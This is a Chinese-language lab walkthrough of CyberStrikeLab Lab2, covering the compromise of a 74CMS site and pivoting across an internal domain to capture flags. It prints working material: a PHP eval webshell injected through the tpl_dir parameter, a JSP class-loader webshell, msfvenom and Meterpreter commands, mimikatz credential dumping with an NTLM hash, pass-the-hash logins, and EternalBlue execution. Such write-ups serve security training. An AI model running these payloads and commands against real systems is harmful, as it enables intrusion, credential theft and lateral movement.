【域渗透】CyberStrikeLab-Lab2,骑士CMS渗透

cyberstrikelab-lab2

web渗透

最开始已经获取到了对方的内网ip,192.168.10.10 ,通过fscan扫描内网并探测一定数量的端口,扫描结果先808端口是web服务,通过页面的title显示出这是骑士cms内容管理系统

image-20251206143803524

访问这个界面是骑士cms

image-20251206143741614

翻到最底下,发现系统版本

image-20251206143834664

随便找几篇文章看看有没有poc

image-20251206150527183

https://xz.aliyun.com/news/3368

找到一个poc

image-20251206150556083

输入poc,自动跳转到登录界面,看来没有未授权登录漏洞

http://192.168.10.10:808/index.php?m=Admin&c=Tpl&a=set&tpl_dir= ', 'a',phpinfo(),'

image-20251206150612894

尝试访问呢一个不存在的页面,爆出来了thinkphp的版本

image-20251206144615991

使用thinkphp综合利用工具,没有漏洞

image-20251206150145948

方案二,爆破后台账号密码

image-20251206145852432

爆破出密码为admin123456

image-20251206150028556

登录后台

image-20251206150344506

再使用poc,能够正常获取php的版本信息

http://192.168.10.10:808/index.php?m=Admin&c=Tpl&a=set&tpl_dir= ', 'a',phpinfo(),'

image-20251206150835964

继续执行,创建一个一句话木马

http://192.168.10.10:808/index.php?m=Admin&c=Tpl&a=set&tpl_dir= ', 'a',eval($_POST['cmd']),'

https://xz.aliyun.com/news/3368,这篇文章已经告诉我们shell的路径在哪了,他会在这个文件里面创建你执行的恶意代码

image-20251206154044465

来访问这个界面,正常执行我们刚刚嵌入的恶意代码

http://192.168.10.10:808/Application/Home/Conf/config.php

image-20251206153353395

打开蚁剑,输入链接和密码

image-20251206154009926

在c盘找到flag

image-20251206161006555

使用msf创建一个马

msfvenom -p windows/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe

image-20251206154459108

使用蚁剑上传

image-20251206154447593

打开msf,开启监听

# kali
msfconsole
use multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.10.10
# 蚁剑执行上传成功的木马
shell.exe

image-20251206154849573

内网渗透

上线之后,发现是系统权限。进入命令行

shell
chcp 65001 
whoami
# 发现是系统权限,不用额外提权

image-20251206155004808

退出会话,将会话保留在后台

exit
bg

image-20251206155316046

在本机查找fscan

find / -name "fscan*" 2>/dev/null

image-20251206155325005

找到fscan位置后,进入会话1 并上传fscan

sessions 1
upload /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe

image-20251206155446330

在当前目录下找到fscan

image-20251206155633184

利用fscan扫内网,发现另外两台主机192.168.10.20192.168.10.233,20机器的8080端口是web服务

image-20251206155743961

访问界面,是一个tomcat

image-20251206160412684

tomcat文件上传漏洞 https://blog.csdn.net/allintao/article/details/129503762

200表示ok,上传成功

image-20251206165636191

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

连接测试

image-20251206165830204

将之前的生成的马上传上去

image-20251206170141393

准备上线msf

# msf
use multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.10.20
# 蚁剑执行上传成功的木马
shell.exe

image-20251206170509419

成功拿下20权限,使用msfgetsystem进行提权,结果显示,成功提权到system权限

image-20251206171603060

在根目录找到flag2

image-20251206171229100

输入ipconfig,看到另一个网卡地址

image-20251206173843639

再上传fscan,这个新的网卡

upload /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe

image-20251206173858190

发现20.30 机器存在永恒之蓝漏洞

image-20251206173757298

再来设置路由,此时你会有两个会话和路由

run autoroute -s 192.168.20.0/24
run autoroute -p

image-20251206174219129

域渗透

上传mimikatz.exe 抓取系统hash

使用find查找

find / -name "mimika*.exe" 2>/dev/null

image-20251206171832288

进入shell

image-20251206171916798

执行命令

.\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

image-20251206172922266

抓取到administrator用户的NTML hash

0a571981f9373e059c6c6313c2469359

image-20251206172944088

准备好frp配置文件,搭建正向代理,客户端配置

image-20251206195926335

服务端配置

image-20251206193203473

PTH登录,并且上传frp

evil-winrm -i 192.168.10.20 -u Administrator  -H "0a571981f9373e059c6c6313c2469359"
upload windows_x64_admin.exe

image-20251206200702503

启动

# kali
./frpc -c frpc.ini

# 靶机
./frps.exe -c frps.ini

image-20251206200055904

修改代理配置文件

vi /etc/proxychains4.conf

image-20251206200149946

使用proxychains代理启动msf

proxychains msfconsole

image-20251206200121556

使用永恒之蓝命令执行模块,能够正常执行命令

use admin/smb/ms17_010_command
set RHOSTS 192.168.20.30
set command whoami
run

image-20251206200229059

找到最后一台机器的flag

set command type C:\\flag.txt
run

image-20251206200515943

本站小部分内容转载于互联网,如有侵权还请联系
THE END
喜欢就关注一下咱们公众号吧
点赞31 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片快捷回复

    暂无评论内容